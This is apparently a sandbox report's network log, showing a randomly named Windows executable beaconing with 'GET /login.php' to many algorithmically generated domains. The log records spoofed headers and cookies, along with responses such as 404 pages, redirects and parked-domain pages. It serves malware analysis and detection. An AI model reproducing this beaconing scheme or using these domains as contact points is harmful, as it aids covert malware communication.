Nov 11, 2024 18:13:48.122313976 CET	1236	IN	HTTP/1.1 404 Not Found Content-Type: text/html Server: Microsoft-IIS/7.5 X-Powered-By: ASP.NET Date: Mon, 11 Nov 2024 17:13:42 GMT Content-Length: 1245 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 53 74 72 69 63 74 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 69 73 6f 2d 38 38 35 39 2d 31 22 2f 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 2d 20 46 69 6c 65 20 6f 72 20 64 69 72 65 63 74 6f 72 79 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0d 0a 3c 21 2d 2d 0d 0a 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e [TRUNCATED] Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/><title>404 - File or directory not found.</title><style type="text/css">...body{margin:0;font-size:.7em;font-family:Verdana, Arial, Helvetica, sans-serif;background:#EEEEEE;}fieldset{padding:0 15px 10px 15px;} h1{font-size:2.4em;margin:0;color:#FFF;}h2{font-size:1.7em;margin:0;color:#CC0000;} h3{font-size:1.2em;margin:10px 0 0 0;color:#000000;} #header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:"trebuchet MS", Verdana, sans-serif;color:#FFF;background-color:#555555;}#content{margin:0 0 0 2%;position:relative;}.content-container{background:#FFF;width:96%;margin-top:8px;padding:10px;position:relative;}--></style></head><body><div id="header"><h1>Server Error</h1></div><div id="content"> <div class="content-contai [TRUNCATED]
Nov 11, 2024 18:13:48.122374058 CET	169	IN	Data Raw: 20 20 3c 68 33 3e 54 68 65 20 72 65 73 6f 75 72 63 65 20 79 6f 75 20 61 72 65 20 6c 6f 6f 6b 69 6e 67 20 66 6f 72 20 6d 69 67 68 74 20 68 61 76 65 20 62 65 65 6e 20 72 65 6d 6f 76 65 64 2c 20 68 61 64 20 69 74 73 20 6e 61 6d 65 20 63 68 61 6e 67 Data Ascii: <h3>The resource you are looking for might have been removed, had its name changed, or is temporarily unavailable.</h3> </fieldset></div></div></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
75	192.168.2.6	59149	75.2.71.199	80	936	C:\Program Files (x86)\nFQGqJWqToOcwOOJpiJkvdMoOKWSaIRQUUaYcAtfduoYRgKrHBzFLFNpnZWbYXGDOpsSxIrpvMuErJL\NcYLgtXIKJgHj.exe

Timestamp	Bytes transferred	Direction	Data
Nov 11, 2024 18:13:47.646869898 CET	243	OUT	GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: puzylyp.com
Nov 11, 2024 18:13:48.096736908 CET	166	IN	HTTP/1.1 308 Permanent Redirect Connection: close Location: https://puzylyp.com/login.php Server: Caddy Date: Mon, 11 Nov 2024 17:13:48 GMT Content-Length: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
76	192.168.2.6	59143	44.221.84.105	80	936	C:\Program Files (x86)\nFQGqJWqToOcwOOJpiJkvdMoOKWSaIRQUUaYcAtfduoYRgKrHBzFLFNpnZWbYXGDOpsSxIrpvMuErJL\NcYLgtXIKJgHj.exe

Timestamp	Bytes transferred	Direction	Data
Nov 11, 2024 18:13:47.659254074 CET	353	OUT	GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: vocyzit.com Cookie: snkz=66.23.206.109; btst=97471f70b05d0f64af71004a8ad4014f\|66.23.206.109\|1731345224\|1731345181\|12\|3\|0
Nov 11, 2024 18:13:48.094588041 CET	334	IN	HTTP/1.1 200 OK Server: nginx Date: Mon, 11 Nov 2024 17:13:48 GMT Content-Type: text/html Transfer-Encoding: chunked Connection: close Set-Cookie: btst=97471f70b05d0f64af71004a8ad4014f\|66.23.206.109\|1731345228\|1731345181\|8\|4\|0; path=/; domain=.vocyzit.com; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax; Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port
77	192.168.2.6	59150	208.100.26.245	80

Timestamp	Bytes transferred	Direction	Data
Nov 11, 2024 18:13:47.667139053 CET	243	OUT	GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: lyvyxor.com
Nov 11, 2024 18:13:48.120119095 CET	744	IN	HTTP/1.1 404 Not Found Server: nginx/1.14.0 (Ubuntu) Date: Mon, 11 Nov 2024 17:13:48 GMT Content-Type: text/html Content-Length: 580 Connection: keep-alive Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 34 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 [TRUNCATED] Data Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>nginx/1.14.0 (Ubuntu)</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->

Session ID	Source IP	Source Port	Destination IP	Destination Port
78	192.168.2.6	59153	85.17.31.82	80

Timestamp	Bytes transferred	Direction	Data
Nov 11, 2024 18:13:49.822135925 CET	243	OUT	GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: gatyfus.com

Session ID	Source IP	Source Port	Destination IP	Destination Port
79	192.168.2.6	59154	188.114.97.3	80

Timestamp	Bytes transferred	Direction	Data
Nov 11, 2024 18:13:49.822596073 CET	243	OUT	GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: qegyhig.com
Nov 11, 2024 18:13:50.502840042 CET	970	IN	HTTP/1.1 301 Moved Permanently Date: Mon, 11 Nov 2024 17:13:50 GMT Content-Type: text/html Transfer-Encoding: chunked Connection: keep-alive Location: https://qegyhig.com/login.php cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=hyjsAmaCXLjqpiNBHuoYIAr%2FIA2tYXGhDuX%2BVVx1g7YJz9v4UfbRqi9fhcOoOIoMSFgKJJRF3cLbKcJs2UBjG%2FuD9KGEiAc%2BlGZNiu0IH8WdPC03nm83WHzy8LS94g%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8e0fea48beca41ac-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1192&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=243&delivery_rate=0&cwnd=239&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 61 32 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 0d 0a 30 0d 0a 0d 0a Data Ascii: a2<html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx</center></body></html>0

Session ID	Source IP	Source Port	Destination IP	Destination Port
80	192.168.2.6	59155	199.59.243.227	80

Timestamp	Bytes transferred	Direction	Data
Nov 11, 2024 18:13:49.822824955 CET	305	OUT	GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: vojyqem.com Cookie: parking_session=ff4a393e-1a61-4543-92b2-8dd8ca6534da
Nov 11, 2024 18:13:50.251158953 CET	1236	IN	HTTP/1.1 200 OK date: Mon, 11 Nov 2024 17:13:49 GMT content-type: text/html; charset=utf-8 content-length: 1094 x-request-id: 53ac1dfc-324d-468f-9be9-d6ce1f2935fc cache-control: no-store, max-age=0 accept-ch: sec-ch-prefers-color-scheme critical-ch: sec-ch-prefers-color-scheme vary: sec-ch-prefers-color-scheme x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_VMytHbmmrfMc+kzmiPYTt2uS2PDnHHj/p/2nCNN04G2eOrYX/LSI9ifattC96o92xCzWruQ65ql9+oondzcTDQ== set-cookie: parking_session=ff4a393e-1a61-4543-92b2-8dd8ca6534da; expires=Mon, 11 Nov 2024 17:28:50 GMT Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 61 74 61 2d 61 64 62 6c 6f 63 6b 6b 65 79 3d 22 4d 46 77 77 44 51 59 4a 4b 6f 5a 49 68 76 63 4e 41 51 45 42 42 51 41 44 53 77 41 77 53 41 4a 42 41 4e 44 72 70 32 6c 7a 37 41 4f 6d 41 44 61 4e 38 74 41 35 30 4c 73 57 63 6a 4c 46 79 51 46 63 62 2f 50 32 54 78 63 35 38 6f 59 4f 65 49 4c 62 33 76 42 77 37 4a 36 66 34 70 61 6d 6b 41 51 56 53 51 75 71 59 73 4b 78 33 59 7a 64 55 48 43 76 62 56 5a 76 46 55 73 43 41 77 45 41 41 51 3d 3d 5f 56 4d 79 74 48 62 6d 6d 72 66 4d 63 2b 6b 7a 6d 69 50 59 54 74 32 75 53 32 50 44 6e 48 48 6a 2f 70 2f 32 6e 43 4e 4e 30 34 47 32 65 4f 72 59 58 2f 4c 53 49 39 69 66 61 74 74 43 39 36 6f 39 32 78 43 7a 57 72 75 51 36 35 71 6c 39 2b 6f 6f 6e 64 7a 63 54 44 51 3d 3d 22 20 6c 61 6e 67 3d 22 65 6e 22 20 73 74 79 6c 65 3d 22 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 32 42 32 42 32 42 3b 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d [TRUNCATED] Data Ascii: <!doctype html><html data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_VMytHbmmrfMc+kzmiPYTt2uS2PDnHHj/p/2nCNN04G2eOrYX/LSI9ifattC96o92xCzWruQ65ql9+oondzcTDQ==" lang="en" style="background: #2B2B2B;"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <link rel="icon" href="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAIAAACQd1PeAAAADElEQVQI12P4//8/AAX+Av7czFnnAAAAAElFTkSuQmCC"> <link rel="preconnect
Nov 11, 2024 18:13:50.251180887 CET	520	IN	Data Raw: 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 22 20 63 72 6f 73 73 6f 72 69 67 69 6e 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 64 69 76 20 69 64 3d 22 74 61 72 67 65 74 22 20 73 74 79 6c 65 Data Ascii: " href="https://www.google.com" crossorigin></head><body><div id="target" style="opacity: 0"></div><script>window.park = "eyJ1dWlkIjoiZmY0YTM5M2UtMWE2MS00NTQzLTkyYjItOGRkOGNhNjUzNGRhIiwicGFnZV90aW1lIjoxNzMxMzQ1MjMwLCJwYWdlX3VybCI6Imh0dHA6L

Session ID	Source IP	Source Port	Destination IP	Destination Port
81	192.168.2.6	59156	75.2.71.199	80

Timestamp	Bytes transferred	Direction	Data
Nov 11, 2024 18:13:49.827094078 CET	243	OUT	GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: puzylyp.com
Nov 11, 2024 18:13:50.256191015 CET	166	IN	HTTP/1.1 308 Permanent Redirect Connection: close Location: https://puzylyp.com/login.php Server: Caddy Date: Mon, 11 Nov 2024 17:13:50 GMT Content-Length: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port
82	192.168.2.6	59157	199.191.50.83	80

Timestamp	Bytes transferred	Direction	Data
Nov 11, 2024 18:13:49.839425087 CET	281	OUT	GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: galyqaz.com Cookie: vsid=903vr478890781963739088
Nov 11, 2024 18:13:51.433240891 CET	1236	IN	HTTP/1.1 200 OK Date: Mon, 11 Nov 2024 17:13:50 GMT Server: Apache Referrer-Policy: no-referrer-when-downgrade Accept-CH: Sec-CH-Save-Data, Sec-CH-DPR, Sec-CH-Width, Sec-CH-Viewport-Width, Sec-CH-Viewport-Height, Sec-CH-Device-Memory, Sec-CH-RTT, Sec-CH-Downlink, Sec-CH-ECT, Sec-CH-Prefers-Color-Scheme, Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version Permissions-Policy: ch-ua-platform-version=("https://dts.gnpge.com"), ch-ua-model=("https://dts.gnpge.com") X-Adblock-Key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBAKX74ixpzVyXbJprcLfbH4psP4+L2entqri0lzh6pkAaXLPIcclv6DQBeJJjGFWrBIF6QMyFwXT5CCRyjS2penECAwEAAQ==_NHOnw0G73BscnvIcyf8HaXYxUwB52N5y4R2rV77ldfg6F/P3HTMIgnr4aIPWR/fyPGslgb3huQzNdSH/7sK+hw== Transfer-Encoding: chunked Content-Type: text/html; charset=UTF-8 Data Raw: 61 39 39 61 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 65 63 6f 6e 6e 65 63 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 64 65 6c 69 76 65 72 79 2e 63 6f 6e 73 65 6e 74 6d 61 6e 61 67 65 72 2e 6e 65 74 22 3e 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 65 63 6f 6e 6e 65 63 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 2e 63 6f 6e 73 65 6e 74 6d 61 6e 61 67 65 72 2e 6e 65 74 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 73 63 72 69 70 74 3e 77 69 6e 64 6f 77 2e 63 6d 70 5f 73 74 61 79 69 6e 69 66 72 61 6d 65 20 3d 20 31 3b 20 77 69 6e 64 6f 77 2e 63 6d 70 5f 64 6f 6e 74 6c 6f 61 64 69 6e 69 66 72 61 6d 65 20 3d 20 74 72 75 65 3b 20 69 66 28 [TRUNCATED] Data Ascii: a99a<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"><html><head><link rel="preconnect" href="https://delivery.consentmanager.net"> <link rel="preconnect" href="https://cdn.consentmanager.net"> <script>window.cmp_stayiniframe = 1; window.cmp_dontloadiniframe = true; if(!"gdprAppliesGlobally" in window){window.gdprAppliesGlobally=true}i
Nov 11, 2024 18:13:51.433345079 CET	1236	IN	Data Raw: 66 28 21 28 22 63 6d 70 5f 69 64 22 20 69 6e 20 77 69 6e 64 6f 77 29 7c 7c 77 69 6e 64 6f 77 2e 63 6d 70 5f 69 64 3c 31 29 7b 77 69 6e 64 6f 77 2e 63 6d 70 5f 69 64 3d 30 7d 69 66 28 21 28 22 63 6d 70 5f 63 64 69 64 22 20 69 6e 20 77 69 6e 64 6f Data Ascii: f(!("cmp_id" in window)\|\|window.cmp_id<1){window.cmp_id=0}if(!("cmp_cdid" in window)){window.cmp_cdid="21fdca2281833"}if(!("cmp_params" in window)){window.cmp_params=""}if(!("cmp_host" in window)){window.cmp_host="a.delivery.consentmanager.net
Nov 11, 2024 18:13:51.433357954 CET	1236	IN	Data Raw: 65 64 4c 61 6e 67 73 28 29 3b 76 61 72 20 63 3d 5b 5d 3b 76 61 72 20 66 3d 6c 6f 63 61 74 69 6f 6e 2e 68 61 73 68 3b 76 61 72 20 65 3d 6c 6f 63 61 74 69 6f 6e 2e 73 65 61 72 63 68 3b 76 61 72 20 61 3d 22 6c 61 6e 67 75 61 67 65 73 22 20 69 6e 20 Data Ascii: edLangs();var c=[];var f=location.hash;var e=location.search;var a="languages" in navigator?navigator.languages:[];if(f.indexOf("cmplang=")!=-1){c.push(f.substr(f.indexOf("cmplang=")+8,2).toUpperCase())}else{if(e.indexOf("cmplang=")!=-1){c.pus
Nov 11, 2024 18:13:51.433372021 CET	1236	IN	Data Raw: 3d 22 22 3b 69 2b 3d 22 3d 22 3b 76 61 72 20 73 3d 69 2e 6c 65 6e 67 74 68 3b 76 61 72 20 64 3d 6c 6f 63 61 74 69 6f 6e 3b 69 66 28 64 2e 68 61 73 68 2e 69 6e 64 65 78 4f 66 28 69 29 21 3d 2d 31 29 7b 77 3d 64 2e 68 61 73 68 2e 73 75 62 73 74 72 Data Ascii: ="";i+="=";var s=i.length;var d=location;if(d.hash.indexOf(i)!=-1){w=d.hash.substr(d.hash.indexOf(i)+s,9999)}else{if(d.search.indexOf(i)!=-1){w=d.search.substr(d.search.indexOf(i)+s,9999)}else{return e}}if(w.indexOf("&")!=-1){w=w.substr(0,w.in
Nov 11, 2024 18:13:51.433383942 CET	1236	IN	Data Raw: 72 72 65 6e 74 53 63 72 69 70 74 2e 70 61 72 65 6e 74 45 6c 65 6d 65 6e 74 29 7b 75 2e 63 75 72 72 65 6e 74 53 63 72 69 70 74 2e 70 61 72 65 6e 74 45 6c 65 6d 65 6e 74 2e 61 70 70 65 6e 64 43 68 69 6c 64 28 6a 29 7d 65 6c 73 65 7b 69 66 28 75 2e Data Ascii: rrentScript.parentElement){u.currentScript.parentElement.appendChild(j)}else{if(u.body){u.body.appendChild(j)}else{var t=v("body");if(t.length==0){t=v("div")}if(t.length==0){t=v("span")}if(t.length==0){t=v("ins")}if(t.length==0){t=v("script")}
Nov 11, 2024 18:13:51.433398962 CET	1236	IN	Data Raw: 69 6e 67 3e 30 29 7b 61 2e 73 72 63 3d 22 2f 2f 22 2b 77 69 6e 64 6f 77 2e 63 6d 70 5f 63 64 6e 2b 22 2f 64 65 6c 69 76 65 72 79 2f 65 6d 70 74 79 2e 68 74 6d 6c 22 7d 61 2e 6e 61 6d 65 3d 62 3b 61 2e 73 65 74 41 74 74 72 69 62 75 74 65 28 22 74 Data Ascii: ing>0){a.src="//"+window.cmp_cdn+"/delivery/empty.html"}a.name=b;a.setAttribute("title","Intentionally hidden, please ignore");a.setAttribute("role","none");a.setAttribute("tabindex","-1");document.body.appendChild(a)}else{window.setTimeout(wi
Nov 11, 2024 18:13:51.433410883 CET	1236	IN	Data Raw: 70 75 73 68 28 5b 5d 2e 73 6c 69 63 65 2e 61 70 70 6c 79 28 61 29 29 7d 7d 7d 7d 7d 7d 7d 3b 77 69 6e 64 6f 77 2e 63 6d 70 5f 67 70 70 5f 70 69 6e 67 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 7b 67 70 70 56 65 72 73 69 6f 6e 3a 22 31 Data Ascii: push([].slice.apply(a))}}}}}}};window.cmp_gpp_ping=function(){return{gppVersion:"1.0",cmpStatus:"stub",cmpDisplayStatus:"hidden",supportedAPIs:["tcfca","usnat","usca","usva","usco","usut","usct"],cmpId:31}};window.cmp_gppstub=function(){var a=
Nov 11, 2024 18:13:51.433423996 CET	1236	IN	Data Raw: 20 63 3d 61 3f 4a 53 4f 4e 2e 70 61 72 73 65 28 64 2e 64 61 74 61 29 3a 64 2e 64 61 74 61 7d 63 61 74 63 68 28 66 29 7b 76 61 72 20 63 3d 6e 75 6c 6c 7d 69 66 28 74 79 70 65 6f 66 28 63 29 3d 3d 3d 22 6f 62 6a 65 63 74 22 26 26 63 21 3d 3d 6e 75 Data Ascii: c=a?JSON.parse(d.data):d.data}catch(f){var c=null}if(typeof(c)==="object"&&c!==null&&"__cmpCall" in c){var b=c.__cmpCall;window.__cmp(b.command,b.parameter,function(h,g){var e={__cmpReturn:{returnValue:h,success:g,callId:b.callId}};d.source.p
Nov 11, 2024 18:13:51.433434963 CET	1236	IN	Data Raw: 61 5d 3d 77 69 6e 64 6f 77 2e 63 6d 70 5f 73 74 75 62 3b 77 69 6e 64 6f 77 5b 61 5d 2e 6d 73 67 48 61 6e 64 6c 65 72 3d 77 69 6e 64 6f 77 2e 63 6d 70 5f 6d 73 67 68 61 6e 64 6c 65 72 3b 77 69 6e 64 6f 77 2e 61 64 64 45 76 65 6e 74 4c 69 73 74 65 Data Ascii: a]=window.cmp_stub;window[a].msgHandler=window.cmp_msghandler;window.addEventListener("message",window.cmp_msghandler,false)}};window.cmp_setGppStub=function(a){if(!(a in window)\|\|(typeof(window[a])!=="function"&&typeof(window[a])!=="object"&&
Nov 11, 2024 18:13:51.433446884 CET	1236	IN	Data Raw: 7a 2e 63 6f 6d 2f 70 78 2e 6a 73 3f 63 68 3d 32 22 3e 3c 2f 73 63 72 69 70 74 3e 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 66 75 6e 63 74 69 6f 6e 20 68 61 6e 64 6c 65 41 42 50 44 65 74 65 63 74 Data Ascii: z.com/px.js?ch=2"></script><script type="text/javascript">function handleABPDetect(){try{if(!abp) return;var imglog = document.createElement("img");imglog.style.height="0px";imglog.style.width="0px";imglog.src="http://galyqaz.com/sk-logabpstat
Nov 11, 2024 18:13:51.441363096 CET	940	IN	Data Raw: 2c 75 72 6c 28 22 68 74 74 70 3a 2f 2f 69 31 2e 63 64 6e 2d 69 6d 61 67 65 2e 63 6f 6d 2f 5f 5f 6d 65 64 69 61 5f 5f 2f 66 6f 6e 74 73 2f 6d 6f 6e 74 73 65 72 72 61 74 2d 72 65 67 75 6c 61 72 2f 6d 6f 6e 74 73 65 72 72 61 74 2d 72 65 67 75 6c 61 Data Ascii: ,url("http://i1.cdn-image.com/__media__/fonts/montserrat-regular/montserrat-regular.woff2") format("woff2"),url("http://i1.cdn-image.com/__media__/fonts/montserrat-regular/montserrat-regular.ttf") format("truetype"),url("http://i1.cdn-image.co

Session ID	Source IP	Source Port	Destination IP	Destination Port
83	192.168.2.6	59159	44.221.84.105	80

Timestamp	Bytes transferred	Direction	Data
Nov 11, 2024 18:13:49.986660004 CET	353	OUT	GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: vocyzit.com Cookie: snkz=66.23.206.109; btst=97471f70b05d0f64af71004a8ad4014f\|66.23.206.109\|1731345224\|1731345181\|12\|3\|0
Nov 11, 2024 18:13:50.417131901 CET	334	IN	HTTP/1.1 200 OK Server: nginx Date: Mon, 11 Nov 2024 17:13:50 GMT Content-Type: text/html Transfer-Encoding: chunked Connection: close Set-Cookie: btst=97471f70b05d0f64af71004a8ad4014f\|66.23.206.109\|1731345230\|1731345181\|9\|4\|0; path=/; domain=.vocyzit.com; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax; Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port
84	192.168.2.6	59161	3.94.10.34	80

Timestamp	Bytes transferred	Direction	Data
Nov 11, 2024 18:13:49.992758989 CET	353	OUT	GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: lymyxid.com Cookie: snkz=66.23.206.109; btst=a6a1e25fd407ed990568203a5694c412\|66.23.206.109\|1731345224\|1731345181\|12\|3\|0
